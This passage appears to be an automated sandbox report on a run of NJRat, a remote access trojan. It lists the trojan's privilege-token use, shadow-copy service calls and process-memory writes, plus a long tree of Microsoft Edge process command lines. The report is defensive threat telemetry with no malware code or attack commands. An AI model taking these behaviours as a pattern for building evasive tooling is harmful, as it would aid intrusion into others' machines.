NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe 5424 NJRat.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 42 IoCs
Processes:
msedge.exepid process 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
powershell.exeNJRat.exeNJRat.exevssvc.exeNJRat.exedescription pid process Token: SeDebugPrivilege 3440 powershell.exe Token: SeDebugPrivilege 5424 NJRat.exe Token: SeDebugPrivilege 5524 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: SeBackupPrivilege 6824 vssvc.exe Token: SeRestorePrivilege 6824 vssvc.exe Token: SeAuditPrivilege 6824 vssvc.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: SeDebugPrivilege 34364 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe Token: 33 5424 NJRat.exe Token: SeIncBasePriorityPrivilege 5424 NJRat.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
msedge.exepid process 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe 3552 msedge.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
WINWORD.EXEpid process 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE 4540 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3552 wrote to memory of 5048 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 5048 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3800 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3196 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 3196 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe PID 3552 wrote to memory of 1884 3552 msedge.exe msedge.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youtube.com1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5d5e46f8,0x7ffc5d5e4708,0x7ffc5d5e47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4972 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3580 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3400 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6880 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3316 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6620 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6996 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6940 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
